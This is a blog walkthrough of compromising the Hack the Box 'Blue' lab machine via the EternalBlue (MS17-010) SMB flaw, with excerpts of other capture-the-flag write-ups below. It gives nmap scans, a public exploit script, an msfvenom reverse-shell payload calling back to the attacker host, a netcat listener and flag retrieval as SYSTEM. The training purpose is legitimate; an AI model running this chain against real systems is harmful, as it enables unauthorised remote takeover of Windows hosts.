Hack the Box - Blue - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Blue machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Blue machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.51.140.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.51.140


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -sV -T4 -p135,139,445 10.129.51.140



Seeing that there are SMB ports open, let's do a check for SMB vulnerabilities via Nmap:

nmap -p139,445 --script=smb-vuln* 10.129.51.140



Looks like this system is vulnerable to MS17-010, aka Eternal Blue. There's a go-to Python script we like to use to exploit Eternal Blue, and it can be found at the following URL:

https://github.com/helviojunior/MS17-010

Specifically, the script we want to use is this one:

https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py

These scripts should be downloaded as a package, as there are dependency files they all use included in there. One more thing to note is that the scripts require the impacket module to run.

Finding a Way In

Once we have the MS17-010 script package downloaded and setup, we need to create an executable file to pair with the script. In this case, we want the executable to create a reverse shell to our attacking system. We can create the executable with MSFvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=443 -f exe -o HTBwinRevShell443.exe


After a bit of testing, we find that we need to set a username in the send_and_execute.py script in order for the exploit to run properly. So let's make that adjustment now:


One last thing we need to do before we run our exploit is setup a Netcat listener on our attacking system:

sudo nc -nlvp 443


Now we're all set to run the exploit:

python send_and_execute.py 10.129.51.140 HTBwinRevShell443.exe
whoami




Because the Eternal Blue exploit runs commands with elevated privileges, the reverse shell created with it runs as NT AUTHORITY\SYSTEM, so we don't have to do any further privilege escalation.

Capturing the User Flag

Let's take this opportunity to collect the system's flags. Hack the Box's Windows systems usually store the User flag in a user's Desktop directory. Let's search for it now:

cd \
dir user.txt /s
type "C:\Users\haris\Desktop\user.txt"





Capturing the Root Flag

Similar to the User flag, the Root flag is usually located in the Administrator's Desktop directory:

dir root.txt /s
type "C:\Users\Administrator\Desktop\root.txt"



Summary

After initial scans, we found that the target's SMB service ws vulnerable to the Eternal Blue exploit, which we used to gain elevated remote access to the system, and were thus able to gain access to the User and Root flags.

Finish

Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - Web Enumeration - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Web Enumeration room hosted at https://tryhackme.com/room/ webenumerationv2 . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed vulnerable Web clients as the the victim machines. Task 1 - Introduction Questions: Let's get started No answer needed Task 2 - Manual Enumeration Questions I gotcha! No answer needed Task 3 - 1. introduction to Gobuster Questions No questions No answer needed Task 4 - 1.1 Gobuster Modes Questions I get the hang of it! No answer needed Task 5 - 1.2 Useful Wordlists Questions No questions No answer needed Task 6 - 1.3 Practical: Gobuster (Deploy #1) Questions Run a directory scan on the host. Other than the standard css, images and js directories, what other directories are available? echo “10.10.164.99 webenum.thm” >> /etc/hosts gobuster dir -t 16 -u http://webenum.thm -w /usr/sha...
Read more